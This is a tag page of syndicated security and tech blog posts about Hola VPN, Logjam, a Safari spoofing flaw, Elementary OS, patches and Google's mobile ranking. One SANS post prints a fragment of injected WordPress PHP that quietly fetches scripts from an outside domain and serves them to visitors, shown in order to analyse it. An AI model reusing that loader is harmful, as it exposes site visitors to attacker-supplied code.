Posts tagged ‘chrome’

TorrentFreak: Hola VPN Sells Users’ Bandwidth, Founder Confirms

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

hola-logoFaced with increasing local website censorship and Internet services that restrict access depending on where a user is based, more and more people are turning to specialist services designed to overcome such limitations.

With prices plummeting to just a few dollars a month in recent years, VPNs are now within the budgets of most people. However, there are always those who prefer to get such services for free, without giving much consideration to how that might be economically viable.

One of the most popular free VPN/geo-unblocking solutions on the planet is operated by Israel-based Hola. It can be added to most popular browsers in seconds and has an impressive seven million users on Chrome alone. Overall the company boasts 46 million users of its service.

Now, however, the company is facing accusations from 8chan message board operator Fredrick Brennan. He claims that Hola users’ computers were used to attack his website without their knowledge, and that was made possible by the way Hola is setup.

“When a user installs Hola, he becomes a VPN endpoint, and other users of the Hola network may exit through his internet connection and take on his IP. This is what makes it free: Hola does not pay for the bandwidth that its VPN uses at all, and there is no user opt out for this,” Brennan says.

This means that rather than having their IP addresses cloaked behind a private server, free Hola users are regularly exposing their IP addresses to the world but associated with other people’s traffic – no matter what that might contain.

hola-big

While this will come as a surprise to many, Hola says it has never tried to hide the methods it employs to offer a free service.

Speaking with TorrentFreak, Hola founder Ofer Vilenski says that his company offers two tiers of service – the free option (which sees traffic routed between Hola users) and a premium service, which operates like a traditional VPN.

However, Brennan says that Hola goes a step further, by selling Hola users’ bandwidth to another company.

“Hola has gotten greedy. They recently (late 2014) realized that they basically have a 9 million IP strong botnet on their hands, and they began selling access to this botnet (right now, for HTTP requests only) at https://luminati.io,” the 8chan owner says.

TorrentFreak asked Vilenski about Brennan’s claims. Again, there was no denial.

“We have always made it clear that Hola is built for the user and with the user in mind. We’ve explained the technical aspects of it in our FAQ and have always advertised in our FAQ the ability to pay for non-commercial use,” Vilenski says.

And this is how it works.

Hola generates revenue by selling a premium service to customers through its Luminati brand. The resources and bandwidth for the Luminati product are provided by Hola users’ computers when they are sitting idle. In basic terms, Hola users get their service for free as long as they’re prepared to let Hola hand their resources to Luminati for resale. Any users who don’t want this to happen can buy Hola for $5 per month.

Fair enough perhaps – but how does Luminati feature in Brennan’s problems? It appears his interest in the service was piqued after 8chan was hit by multiple denial of service attacks this week which originated from the Luminati / Hola network.

“An attacker used the Luminati network to send thousands of legitimate-looking POST requests to 8chan’s post.php in 30 seconds, representing a 100x spike over peak traffic and crashing PHP-FPM,” Brennan says.

Again, TorrentFreak asked Vilenski for his input. Again, there was no denial.

“8chan was hit with an attack from a hacker with the handle of BUI. This person then wrote about how he used the Luminati commercial VPN network to hack 8chan. He could have used any commercial VPN network, but chose to do so with ours,” Vilenski explains.

“If 8chan was harmed, then a reasonable course of action would be to obtain a court order for information and we can release the contact information of this user so that they can further pursue the damages with him.”

Vilenski says that Hola screens users of its “commercial network” (Luminati) prior to them being allowed to use it but in this case “BUI” slipped through the net. “Adjustments” have been made, Hola’s founder says.

“We have communicated directly with the founder of 8Chan to make sure that once we terminated BUI’s account they’ve had no further problems, and it seems that this is the case,” Vilenski says.

It is likely the majority of Hola’s users have no idea how the company’s business model operates, even though it is made fairly clear in its extensive FAQ/ToS. Installing a browser extension takes seconds and if it works as advertised, most people will be happy.

Whether this episode will affect Hola’s business moving forward is open to question but for those with a few dollars to spend there are plenty of options in the market. Until then, however, those looking for free options should read the small print before clicking install.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Thanks to one of our readers, for sending us this snipped of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):

#2b8008# ">">/* turn off error reporting */
@ini_set(display_errors ">/* do not display errors to the user */
$wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */

if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610)))
{ ">
# Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent]

$wp_mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua="># check if we have the curl extension installed

if (function_exists(curl_init) function_exists(curl_exec"># if we dont have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen"># or try fopen as a last resort
elseif (function_exists(fopen) function_exists(stream_get_contents)) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, r}}

if (substr($wp_8610mezd,1,3) === scr"># The data retrieved will be echoed back to the user if it starts with the string scr.

I havent been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet willbe appreciated.


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve — the most efficient algorithm for breaking a Diffie-Hellman connection — is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”

[…]

The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation — just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

SANS Internet Storm Center, InfoCON: green: Address spoofing vulnerability in Safari Web Browser, (Mon, May 18th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A new vulnerability arised in Safari Web Browser that can lead to an address spoofing allowing attackers to show any URL address while loading a different web page. While this proof of concept is not perfect, it could definitely be fixed to be used by phishing attacks very easily.

There is a proof of concept http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari Web Browser:

From same iPad using Google Chrome:

The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the real” />

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Pelez
SANS Internet Storm Center – Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: Elementary OS Freya: Is This The Next Big Linux Distro?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Freya default desktop

I’ve tried just about every flavor of Linux available. Not a desktop interface has gone by that hasn’t, in some way, touched down before me. So when I set out to start kicking the tires of Elementary OS Freya, I assumed it was going to be just another take on the same old desktop metaphors. A variation of GNOME, a tweak of Xfce, a dash of OSX or some form of Windows, and the slightest hint of Chrome OS. What I wound up seeing didn’t disappoint on that level—it was a mixed bag of those very things. However, that mixed bag turned out to be something kind of special … something every Linux user should take notice of.

Why? Because Elementary OS Freya gets a lot of things right, including some things that other distributions have failed to bring to light. True user-friendliness.

Elementary OS Freya takes all of the known elements of a good UI, blends them together, and doesn’t toss in anything extraneous that might throw the user for a loop. The end result is a desktop interface that anyone (and I do mean anyone) can use without hiccup.

Before I dive any further into this, I must say that Freya is still in beta (and has been for quite some time). That being said, the beta release of Freya is rock solid. You can download the beta here and install it alongside your current OS or as a virtual guest in VirtualBox.

With that said, let’s examine what it is about Elementary OS Freya that makes it, quite possibly, the most ideal Linux desktop distribution (and maybe what it could use to draw it nearer to perfection).

Design

This is where Freya truly nails just about every possible aspect of the desktop interface. Upon installation (or loading up the live image), you are greeted with a minimalist interface that, at first glance, looks like a take on GNOME Shell with an added dock for good measure (Figure 1).

You only need scratch the surface to find out that Freya has taken hints from nearly every major interface and rolled them into a coherent whole that will please everyone. Consider this:

  • OSX dock

  • Chrome OS menu

  • GNOME Shell panel

  • Multiple workspaces

  • OSX consistency in design

  • Ubuntu system settings

  • Ubuntu Software Center.

 Do you see where that is going? With those pieces working as a cohesive unit, the Freya desktop is already light years ahead of a number of platforms. And they do work together very well.

The foundation

Elementary OS did right by choosing Ubuntu as its foundation. With this, they receive the Ubuntu Software Center, which happens to be one of the most user-friendly package managers within the Linux ecosystem. This also adds the Ubuntu System Settings tool, which is quite simple to use (Figure 2).

Figure 2: The Elementary OS Freya System Settings tool.

Where Elementary OS Freya departs from Ubuntu (besides Unity) is the default applications. This also happens to be one area where Freya does stumble a bit. By this, I mean the default web browser. I get the desire to use Midori over the likes of Chrome or Firefox; but the reality is that choice limits the platform in a number of ways (think supported sites). For someone like me, who depends upon Google Drive, Midori simply does not work. When I try to access Google Drive, I receive the warning You are using an unsupported browser.

To get around this, I must install either Chrome or Firefox. Not a problem, of course. All I need to do is hop on over to the Software Center and install Firefox. If I want Chrome, I head over to the Chrome download location and download the installable .deb file. If you install either Chrome or Firefox, surprisingly enough, the design scheme holds true for both.

NOTE: If you want to install Chrome on the current Freya beta, I highly recommend against doing so. Every attempt to load the Chrome download page (through either Midori or Firefox) actually crashes the Freya desktop to the point where a hard restart is necessary. So install Firefox through the Software Center and then download Chrome with Firefox. I did, however, manage to download the .deb file for Chrome on one machine, transfer it (via USB), and then install Chrome on Elementary OS. Once this was done, the Chrome Download page loaded fine (from Chrome only) and Google Drive worked flawlessly.

Missing apps

Outside of a supported browser, the one area that Elementary OS needs a bit of attention is the application selection. Upon installation, you will find no sign of an office suite or graphics tool. In fact, the closest thing to a word processor is the Scratch text editor. There is no LibreOffice to be found (and with the state of Midori rendering Google Drive useless, this is an issue).

Yes, you can hop over to the Software Center and install LibreOffice, but we’re looking at a Linux desktop variant that offers one of the most well designed interfaces for new users. Why make those users jump through hoops to have what nearly every flavor of Linux installs by default? On top of that, when installing LibreOffice through the Software Center (on Elementary OS), you wind up with a very out of date iteration of the software (4.2.8.2) ─ which completely shatters the aesthetics of the platform (Figure 3).

Figure 3: An out-of-date version of LibreOffice breaks the global theme.

Including LibreOffice (and an up-to-date version at that) would take next to nothing. The latest iteration of Ubuntu (15.04) includes LibreOffice 4.4. This release of the flagship open source office suite would be much better suited for Elementary OS Freya … on every level. I highly recommend downloading the main LibreOffice installer and installing with the following steps:

  1. Open a terminal window.

  2. Change into the Downloads folder (assuming you downloaded the file there) with the command cd Downloads.

  3. Unpack the file with the command tar xvzf LibreOffice_XXX.tar.gz (Where XXX is the release number).

  4. Change into the DEBS subfolder of the newly created directory.

  5. Issue the command sudo dpkg -i *deb

Once the installation is complete, you’ll need to run the new install from the command line (since the entries for LibreOffice in the Applications menu will still be the old 4.2 release). The command to run the new version of LibreOffice is libreoffice4.4. Once opened, you can lock the launcher to the dock by right-clicking the LibreOffice icon in the dock and selecting Keep in Dock.

There is so much to love about Elementary OS Freya. Considering this platform is still in beta makes it all the more impressive. Even though there are areas that could use a bit of polish, what we are looking at could easily take over as the single most user-friendly and well designed Linux distribution to date.

Have you given Elementary OS Freya a try? If so, what was your impression? Will you be ready to hop from your current distribution to this new flavor, once it is out of beta? If not, what keeps you from jumping ship?  

Krebs on Security: Adobe, Microsoft Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Microsoft today issued 13 patch bundles to fix roughly four dozen security vulnerabilities in Windows and associated software. Separately, Adobe pushed updates to fix a slew of critical flaws in its Flash Player and Adobe Air software, as well as patches to fix holes in Adobe Reader and Acrobat.

brokenwindowsThree of the Microsoft patches earned the company’s most dire “critical” rating, meaning they fix flaws that can be exploited to break into vulnerable systems with little or no interaction on the part of the user. The critical patches plug at least 30 separate flaws. The majority of those are included in a cumulative update for Internet Explorer. Other critical fixes address problems with the Windows OS, .NET, Microsoft Office, and Silverlight, among other components.

According to security vendor Shavlik, the issues address in MS15-044 deserve special priority in patching, in part because it impacts so many different Microsoft programs but also because the vulnerabilities fixed in the patch can be exploited merely by viewing specially crafted content in a Web page or a document. More information on and links to today’s individual updates can be found here.

Adobe’s fix for Flash Player and AIR fix at least 18 security holes in the programs. Updates are available for Windows, OS X and Linux versions of the software. Mac and Windows users, the latest, patched version is v. 17.0.0.188. 

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

brokenflash-a

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

If you run Adobe Reader, Acrobat or AIR, you’ll need to update those programs as well. Adobe said it is not aware of any active exploits or attacks against any of the vulnerabilities it patched with today’s releases.

Schneier on Security: Protecting Against Google Phishing in Chrome

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Google has a new Chrome extension called “Password Alert”:

To help keep your account safe, today we’re launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you’ve installed it, Password Alert will show you a warning if you type your Google password into a site that isn’t a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here’s how it works for consumer accounts. Once you’ve installed and initialized Password Alert, Chrome will remember a “scrambled” version of your Google Account password. It only remembers this information for security purposes and doesn’t share it with anyone. If you type your password into a site that isn’t a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you’re at risk of being phished so you can update your password and protect yourself.

It’s a clever idea. Of course it’s not perfect, and doesn’t completely solve the problem. But it’s an easy security improvement, and one that should be generalized to non-Google sites. (Although it’s not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.

Slashdot thread.

Toool's Blackbag: Euro-Locks

This post was syndicated from: Toool's Blackbag and was written by: Walter. Original post: at Toool's Blackbag

April 24th, a delegation of Toool visited the Euro-Locks factory in Bastogne, Belgium.

Sales manager Jean-Louis Vincart welcomed us and talked us through the history of Euro-Locks, the factories and products. After that, we visited the actual production facility. The Bastogne factory is huge and almost all of their products are completely build here. We spoke with the R&D people creating new molds, saw molten zamac, steel presses, chrome baths, assembly lines and packaging, so everything from the raw metal to the finished product. It’s interesting to see so many products (both in range of products and the actual number of produced locks) being made here, and having no stock of the finished product.

Thanks to Eric and Martin for making the visit possible.

The Hacker Factor Blog: Great Googly Moogly!

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Google recently made another change to their pagerank algorithm. This time, they are ranking results based on the type of device querying it. What this means: a Google search from a desktop computer will return different results compared to the same search from a mobile device. If a web page is better formatted for a mobile device, then it will have a higher search result rank for searches made from mobile devices.

I understand Google’s desire to have web pages that look good on both desktop and mobile devices. However, shouldn’t the content, authoritativeness, and search topic be more important than whether the page looks pretty on a mobile device?

As a test, I searched Google for “is this picture fake”. The search results on my desktop computer was different than the results from my Android phone. In particular, the 2nd desktop result was completely gone on the mobile device, the FotoForensics FAQ was pushed down on the mobile device, TinEye was moved up on the mobile device, and other analysis services were completely removed from the mobile results.

In my non-algorithmic personal opinion, I think the desktop results returned more authoritative results and better matched the search query than the mobile device results.

Google’s Preference

Google announced that they were doing this change on February 26. They gave developers less than two months notice of this change.

While two months may be plenty of time for small developers to change their site layout, I suspect that most small developers never heard about this change. For larger organization, two months is barely enough time to have a meeting about having a meeting about scheduling a meeting to discuss a site redesign for mobile devices.

In other words: Google barely gave anyone notice, and did not give most sites time to act. This is synonymous with those security researchers who report vulnerabilities to vendors and then set arbitrarily short deadlines before going public. Short deadlines are not about doing the right thing; it’s about pushing an agenda.

Tools for the trade

On the plus side, Google provided a nice web tool for evaluating web sites. This allows site designers to see how their web pages look on a mobile device. (At least, how it will look according to Google.)

Google also provides a mobile guide that describes what Google thinks a good web page layout looks like. For example, you should use large fonts and only one column in the layout. Google also gives suggestions like using dynamic layout web pages (detect the screen and rearrange accordingly) and using separate servers (www.domain and m.domain): one for desktop users and one for mobile devices.

Google’s documentation emphasizes that this is really for smartphone users. They state that by “mobile devices“, they are only talking about smartphones and not tablets, feature phones, and other devices. (I always thought that a mobile device was anything you could use while being mobile…)

Little Time, Little Effort

One of my big irks about Google is that Google’s employees seem to forget that not every company is as big as Google or has as many resources as Google. Not everyone is Google. By giving developers very little time to make changes that better match Google’s preferred design, it just emphasizes how out of touch Google’s developers are with the rest of the world. The requirements decreed in their development guidelines also show an unrealistic view of the world. For example:

  • Google recommends using dynamic web pages for more flexibility. It also means much more testing and requires a larger testing environment. Testing is usually where someone notices that the site lacks usability.

    Google+ has a flexible interface — the number of columns varies based on the width of the browser window. But Google+ also has a horrible multi-column layout that cannot be disabled. And LinkedIn moved most of their billions of options into popups — now you cannot click on anything without it being covered by a popup window first.

    For my own sites, I do try to test with different browsers. Even if I think my site looks great on every mobile device I tested, that does not mean that it will look great on every mobile device. (I cannot test on everything.)

    Providing the same content to every device minimizes the development and testing efforts. It also simplifies the usability options.

  • Google suggests the option of maintaining two URLs or two separate site layouts — one for desktops and one for mobile devices. They overlook that this means twice the development effort, which translates into twice the development costs.
  • Maintaining two URLs also means double the amount of bot traffic indexing the site, double the load on the server, and double the network bandwidth. Right now, about 75% of the traffic to my site comes from bots indexing and mirroring (and attacking) my site. If I maintained two URLs to the same content with different formatting, I would be dividing the visitor load between the two sites (half go mobile and half go desktop), while doubling the bot traffic.
  • Google’s recommendations normalize the site layout. Everyone should use large text. Everyone should use one column for mobile displays, etc.

    Normalizing web site layouts goes against the purpose of HTML and basic web site design. Your web site should look the way that you want it to look. If you want small text, then you can use small text. If you want a wide layout, then you can use a wide layout. Every web site can look different. Just be aware that Google’s pagerank system now penalizes you for looking different and for expressing creativity.

  • Google’s online test for mobile devices does not take into account whether the device is held vertically or horizontally. My Android phone rotates the screen and makes the text larger when I hold it horizontally. According to Google, all mobile pages should be designed for a vertical screen.

Ironically, there has been a lot of effort by mobile web browser developers (not the web site, but the actual browser developers) to mitigate display issues in the browser. One tap zooms into the text and reflows it to fit the screen, another tap zooms out and reflows it again. And rotating the screen makes the browser display wider instead of taller. Google’s demand to normalize the layout really just means that Google has zero confidence in the mobile browser developers and a limited view on how users use mobile devices.

Moving targets

There’s one significant technical issue that is barely addressed by Google’s Mobile Developer Guide: how does a web site detect a mobile device?

According to Google, your code should look at the user-agent field for “Android” and “Mobile”. That may work well with newer Android smartphones, but it won’t help older devices or smartphones that don’t use those keywords. Also, there are plenty of non-smartphone devices that use these words. For example, Apple’s iPad tablet has a user-agent string that says “Mobile” in it.

In fact, there is no single HTTP header that says “Hi! I’m a mobile device! Give me mobile content!” There’s a standard header for specifying supported document formats. There’s a standard header for specifying preferred language. But there is no standard for identifying a mobile device.

There is a great write-up called “How to Detect Mobile Devices“. It lists a bunch of different methods and the trade-offs between each.

For example, you can try to use JavaScript to render the page. This is good for most smartphones, but many feature-phones lack JavaScript support. The question also becomes: what should you detect? Screen size may be a good option, but otherwise there is no standard. This approach can also be problematic for indexing bots since it requires rendering JavaScript to see the layout. (Running JavaScript in a bot becomes a halting problem since the bot cannot predict when the code will finish rendering the page.)

Alternately, you can try to use custom style sheets. There’s a style sheet extension “@media” for specifying a different layout for mobile devices. Unfortunately, many mobile devices don’t support this extension. (Oh the irony!)

Usually people try to detect the mobile device on the server side. Every web browser sends a user-agent string that describes the browser and basic capabilities. For example:

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.3) Gecko/20150308 Firefox/31.9 PaleMoon/25.3.0

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4

Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T530NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36

Opera/9.80 (Android; Opera Mini/7.6.40234/36.1701; U; en) Presto/2.12.423 Version/12.16

The first sample user-agent string identifies the Pale Moon web browser (PaleMoon 25.3.0) on a 64-bit Windows 7 system (Windows NT 6.1; Win64). It says that it is compatible with Firefox 31 (Firefox/31.9) and supports the Gecko toolkit extension (Gecko/20150308). This is likely a desktop system.

The second sample identifies Mobile Safari 8.0 on an iPhone running iOS 8.1.2. This is a mobile device — because I known iPhones are mobile devices, and not because it says “Mobile”.

The third sample identifies the Android browser 1.5 on a Samsung SM-T530NU device running Android 4.4 (KitKat) and configured for English from the United States. It doesn’t say what it is, but I can look it up and determine that the SM-T530NU is a tablet.

The fourth and final example identifies Opera Mini, which is Opera for mobile devices. Other than looking up the browser type, nothing in the user-agent string tells me it is a mobile device.

The typical solution is to have the web site check the user-agent string for known parts. If it sees “Mobile” or “iPhone” then we can assume it is some kind of mobile device — but not necessarily a smartphone. The web site Detect Mobile Browsers offers code snippets for detecting mobile devices. Google’s documentation says to look for ‘Android’ and ‘Mobile’. Here’s the PHP code that Detect Mobile Browsers suggest using:

$useragent=$_SERVER[‘HTTP_USER_AGENT’];
if (preg_match(‘/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i’,$useragent)||preg_match(‘/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i’,substr($useragent,0,4))) { then… }

This is more than just detecting ‘Android’ and ‘Mobile’. If the user-agent string says Android or Meego or Mobile or Avantgo or Blackberry or Blazer or KDDI or Opera (with mini or mobi or mobile)… then it is probably a mobile device.

Of course, there are two big problems with this code. First, it has so many conditions that it is likely to have multiple false-positives (e.g., detecting a tablet or even a desktop as a mobile phone). In fact, we can see this this problem since the regular expression contains “kindle” — the Amazon Kindle is a tablet and not a smartphone. (And the Kindle user-agent string also includes the word ‘Android’ and may include the word ‘Mobile’.)

Second, this long chunk of code is a regular expression — a language describing a pattern to match. All regular expressions are slow to evaluate and more complicated expressions take more time. Unless you have unlimited resources (like Google) or have low web volume, then you probably do not want to run this code on every web page request.

If Google really wants to have every web site provide mobile-specific content, then perhaps they should push through a standard HTTP header for declaring a mobile device, tablet, and other types of devices. Right now, Google is forcing web sites to redesign for devices that they may not be able to detect.

(Of course, none of this handles the case where an anonymizer changes the user-agent setting, or where users change the user-agent value in their browser.)

Low Ranking Advice

Some of Google’s mobile site suggestions are good, but not limited to mobile devices. Enabling server compression and designing pages for fast loading benefit both desktop and mobile browsers.

I actually think that there may be a hidden motivation behind Google’s desire to force web site redesigns… The recommended layout — with large primary text, viewport window, and single column layout — is probably easier for Google to parse and index. In other words, Google wants every site to look the same so it will be easier for Google to index the content.

And then there is the entire anti-competitive edge. Google’s suggestion for detecting mobile devices (look for ‘Android’) excludes non-android devices like Apple’s iPhone. Looking for ‘Mobile’ misclassifies Apple’s iPad, potentially leading to a lesser user experience on Apple products. And Google wants you to make site changes so that your web pages work better with Googlebot. This effectively turns all web sites into Google-specific web sites.

